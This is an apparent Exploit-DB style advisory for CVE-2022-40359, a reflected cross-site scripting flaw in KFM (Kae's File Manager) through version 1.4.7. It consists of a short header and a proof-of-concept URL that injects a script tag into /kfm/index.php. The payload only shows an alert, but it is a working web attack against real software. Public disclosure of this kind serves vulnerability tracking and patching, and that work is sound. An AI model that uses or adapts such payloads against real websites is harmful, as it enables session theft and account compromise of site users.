# Exploit Title: KFM Kae's File Manager - ALL - Reflected Cross-Site Scripting (XSS) # Exploit Author: Scott Sturrock 'ssturrock -at- protonmail -dot- com' # Vendor Homepage: https://code.google.com/archive/p/kfm/downloads # Software Link: https://code.google.com/archive/p/kfm/downloads # Version: ALL # Tested on: Linux, Windows # CVE : CVE-2022-40359 Cross site scripting (XSS) vulnerability in kfm through 1.4.7 via crafted GET request to /kfm/index.php. Visit PoC URL in browser https://{URL]/kfm/index.php/'%3CSCRIPT%3Ealert('XSS');%3C/SCRIPT%3E